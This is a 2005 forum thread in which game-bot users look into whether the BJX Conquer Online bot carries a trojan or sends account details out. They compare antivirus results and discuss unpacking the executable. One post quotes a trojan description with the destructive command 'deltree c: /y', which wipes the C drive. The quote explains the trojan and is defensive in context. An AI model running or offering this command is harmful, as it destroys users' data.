BJX steal your account

[sutte]

The best way is upack and edit the bot not to send packets.
CFYE.exe is packed with UPX, but it is modified.
# I confirmed it using PE iDentifier.
We may need OllyDbg and OllyDump.
I will try it later

[Cryptic]

Quote:

Originally posted by shinichikudo+Aug 12 2005, 18:18--></span><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (shinichikudo @ Aug 12 2005, 18:18)</td></tr><tr><td id='QUOTE'>

Quote:

Quote:

No, not the virus itself; but the fact that this bot may be suspicious.
What if; however, he realised that most of us are going to be mining with accounts like MinerMan1 or such; and did put something in to install at a possible later date; when we become familiar and trust this bot with our main accounts?

Also; to stomp on that other theory, there is NO WAY Tq would ever make a bot like this just for that purpose. For one, look at the quality of the coding done in their actual game.

This bot was updated for any combination of these reasons:
Stolen Accounts/Items
Stolen Personal Information (Although somewhat doubtful)
Hook users into potentially paying for this bot in the near future.

On a totally unrelated note; I think it would be an excellent idea if someone recorded a phonecall to this person; even from a payphone.

Either way; is it possible to disable the login function altogether until something more reliable and trustworth can either be made or implemented?

Also; would blocking all incoming and outcoming connections from all EXE's associated with this program remove the packet being sent; or is it too small to block?

I think it used the loggin as an excuse for internet out going . When you try to log , your firewall will say it trying to connect to the internet. Most people will think it's just sending your username and password to log into server , but maybe it send to another guy and the login server at once. [/b][/quote]
Many People have outdated firewalls then.
Mine would probably Say:
CFYE.exe is initiating an outgoing connection.
Set Rules for this application:
Always Allow:
Always Ask and Allow Now:
Always Ask and Block Now:
Always Block:
Conquer.exe is initiating an outgoing connection.
Set Rules for this application:
Always Allow:
Always Ask and Allow Now:
Always Ask and Block Now:
Always Block:

Or something along those lines.

[Cryptic]

Quote:

Originally posted by sutte@Aug 12 2005, 18:19
The best way is upack and edit the bot not to send packets.
CFYE.exe is packed with UPX, but it is modified.
# I confirmed it using PE iDentifier.
We may need OllyDbg and OllyDump.
I will try it later

We must also attempt to find why it tested Positive to a Trojan Infection. Perhaps somewhere in the code it is hidden; or packed somewhere with CFYE? I haven't opened the file yet; I do not know. Or maybe; something we have not discovered yet:
Maybe the trojan was hooked to the Self-Extracting Winrar Archive.
If I had a copy of just the EXE; I would put it through the same test. Jotti, and Kaspersky works well too for files under 1MB. Perhaps we can find which file in the archive set off the Trojan Warning.

[Cryptic]

It would be interesting to hear from Peach (The former Seraphicz) as to why this is occurring; as he is apparently an insider to the creator of this bot, but I think he may be much more than just someone in the know.
Note: His personal preview of BJX was shown on an earlier thread in the forums. The same account seen in the screenshot was used on the "official" website of BJX. Suspicious. Maybe since he's such good friends with the creator of BJX, he can shine some light on this grim situation?

[BitVector]

Blocking the UDP packets using a firewall just stops BJX from working properly. If you attempt to just block the IP address that the UDP packets are being sent to, then it will send the packets to another IP address.

[Cryptic]

Quote:

Originally posted by BitVector@Aug 12 2005, 19:19
Blocking the UDP packets using a firewall just stops BJX from working properly. If you attempt to just block the IP address that the UDP packets are being sent to, then it will send the packets to another IP address.

Yes. When the UDP Connection to all of his PC's are blocked, it doesn't attempt to log in to the CO Servers; or so I've heard you say. Tricky. He must have expected us to find this.
I'm doubtful this is the only little technique he embedded into this bot; though.

[Matt.dk]

I'm trying to find that post by the user who reported that he/she found a trojan in the bot but I cant find it. I belive that a mod deleted all the posts in that thread, and stickied it in the exploits bots and hacks section. Anyone got the trojan name?

[shinichikudo]

Quote:

Originally posted by Cryptic
Just as a warning; I scanned the latest 1.1 Version of BJX Straight from using Djotti's Malware Scan, and got this:
AntiVir Found nothing
ArcaVir Found Trojan.Bat.Deltree.M
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
UNA Found nothing
VBA32 Found nothing
-------------------------------------------------------------
Information on Trojan.Bat.Deltree:
-------------------------------------------------------------
Just a warning. I was really excited about this release also; but I am just being a little cautious now.

[Matt.dk]

Hmm, I couldn't find any information on the .M variant of this trojan anywhere.. But nearly all its other variants are nukers, there are three core trojan variants. It could be there, logging all accounts in the registry, or perhaps hiding a text file somewhere, or it could be whats responsible for sending and confirming the send of our account information to this guys home computer back in hong kong.

[Cryptic]

Quote:

Originally posted by Matt.dk@Aug 12 2005, 20:34
Hmm, I couldn't find any information on the .M variant of this trojan anywhere.. But nearly all its other variants are nukers, there are three core trojan variants. It could be there, logging all accounts in the registry, or perhaps hiding a text file somewhere, or it could be whats responsible for sending and confirming the send of our account information to this guys home computer back in hong kong.

I found two links on .m, but they were both Asian sites. I assume it might be an Asian variant. Whether it was just a nuker; or a full Trojan; I'm not sure.
I have a feeling that the trojan is there to get the main accounts; that we don't enter into the bot. I would not be surprised IF the virus was hooked to the Self Extracting Archive, as I said before.
Edit: I was able to find this; but it is of little to no help whatsoever.


I am currently trying to translate a page from Korean

[Matt.dk]

Quote:

Originally posted by Cryptic+Aug 12 2005, 20:42--></span><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (Cryptic @ Aug 12 2005, 20:42)</td></tr><tr><td id='QUOTE'> <!--QuoteBegin--Matt.dk@Aug 12 2005, 20:34
Hmm, I couldn't find any information on the .M variant of this trojan anywhere.. But nearly all its other variants are nukers, there are three core trojan variants. It could be there, logging all accounts in the registry, or perhaps hiding a text file somewhere, or it could be whats responsible for sending and confirming the send of our account information to this guys home computer back in hong kong.

I found two links on .m, but they were both Asian sites. I assume it might be an Asian variant. Whether it was just a nuker; or a full Trojan; I'm not sure.
I have a feeling that the trojan is there to get the main accounts; that we don't enter into the bot. I would not be surprised IF the virus was hooked to the Self Extracting Archive, as I said before. [/b][/quote]
If that were true, then all of our systems would be infected with this trojan, regardless of what it does we would all likely be infected, seeing as very few anti viruses pick up this, as you said, most likely asian variant of Trojan.Bat.Deltree

The thing is, if it was a nuker, we would have known that by know, I think we can throw that question out the window of windows, so to speak.

Anyway I booted up my copy of ArcaVir, which I happen to have one of the recent released of, I installed and updated it, ran a scan, and it found Trojan.Bat.Deltree.M, but it only found it within the bots exe. It was not in the rar file that I obtained from a friend, nor was it found within the self extracting version of 1.1 that can be downloaded from the offical website of the bot. Well, at least, ArcaVir didn't find it in the self extractor, but it could be there, hooked and ready to take action, and work in sync with the trojan inside the bot itself, perhaps its second half.

[Cryptic]

Quote:

Originally posted by Matt.dk+Aug 12 2005, 20:50--></span><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (Matt.dk @ Aug 12 2005, 20:50)</td></tr><tr><td id='QUOTE'>

Quote:

Quote:

I found two links on .m, but they were both Asian sites. I assume it might be an Asian variant. Whether it was just a nuker; or a full Trojan; I'm not sure.
I have a feeling that the trojan is there to get the main accounts; that we don't enter into the bot. I would not be surprised IF the virus was hooked to the Self Extracting Archive, as I said before.

If that were true, then all of our systems would be infected with this trojan, regardless of what it does we would all likely be infected, seeing as very few anti viruses pick up this, as you said, most likely asian variant of Trojan.Bat.Deltree

The thing is, if it was a nuker, we would have known that by know, I think we can throw that question out the window of windows, so to speak.

Anyway I booted up my copy of ArcaVir, which I happen to have one of the recent released of, I installed and updated it, ran a scan, and it found Trojan.Bat.Deltree.M, but it only found it within the bots exe. It was not in the rar file that I obtained from a friend, nor was it found within the self extracting version of 1.1 that can be downloaded from the offical website of the bot. Well, at least, ArcaVir didn't find it in the self extractor, but it could be there, hooked and ready to take action, and work in sync with the trojan inside the bot itself, perhaps its second half. [/b][/quote]
I have not executed the archive; and thus anything inside it. So I would sincerely doubt that I would be infected.
Anyway; the english site, I think, is just a list.
The korean site took a while to figure out; but I think it's just patch history or something of that sort. I managed to find a mention of Trojan.Bat.Deltree.M; but it was a simple text box, and nothing more. We will probably need to unpack it before we can go any further. Read the source code of that one Korean Page turned up nothing; I didn't find anything that may assist.
Edit: I Just realized that google was parsing my results. Give me a bit to look around. Perhaps other search engines might come up with more progressive results.

[Pindle]

he's spreading this program to as many as he can, he will probably release 1 or 2 more free ones.. then make it where you must pay for the bot :P. i think he's more into the money( like he way before)

[Cryptic]

Search Results:
I can not be certain, but I am almost sure that this is the root english version of Trojan.bat.deltree (Edits Autoexec.bat):
Taken from:

Quote:

Deltree Trojan usually replaces the contents of the Autoexec.bat file with this line:

deltree c: /y
If the Autoexec.bat file is run, which automatically happens each time you start a Windows 95/98/Me computer, the command deletes all the files on the C drive.

However, Conflicting information lower on the page states that 95/98/ME Are not the only OS' Affected.

Quote:

Systems Affected: Windows 3.x, Windows 95, Windows 98, Windows NT, Windows 2000, Windows XP, Windows Me

I personally think that this is just a template for Windows. And perhaps only 95/98/Me are affected. That would mean XP/2000/NT Users are Exempt from the possible immediate nuking.

Now, a Possible Coincidence? Or something else:
Taken from

Quote:

Conquer FengYun Patch is now formally released. This patch only provides simple leveling and mining functions. We will not supply any destructive functions that could alter the games equilibrium. No duping items items. (PS : does not support Windows 98):

Perhaps a little glitch in the Version of this Trojan? Or, perhaps a version which works only with NT/2000/XP?

Kaspersky shows empty entries, but this is listed under Trojan.bat.deltreey.m:

Quote:

Trojan.BAT.DeltreeY.m (Kaspersky Lab) is also known as: Bat/poin (McAfee), Bat.Deltree.Trojan (Symantec), Troj/Batdt43-A (Sophos), BAT/DelTree.G* (RAV), BAT_DELTREE.E (Trend Micro), BAT/Deltree.E (H+BEDV), BAT/DelAll@troj (FRISK), BV:Qz (ALWIL), BAT.DelTree.G (SOFTWIN), Trojan.Bat.DeltreeY.M (ClamAV), BAT/Deltree.G (Panda), BAT/DelTree.E (Eset)

Whatever is the case, at least; now we ahave a fairly likely-correct translation of the names of Virusses on different Products.

[chocoman4k]

I am looking at the function that connects to the BJX server, and one return error message of it says "The balance of game card is equal to zero, refill your game card please" so I guess he will be charging fees for usage later.

The Login/Password will probably later work as some kind of identification of your game card, though it can be abused too.

Cryptic:
Must be a false detection, I can't find any .bat changing code in the .exe.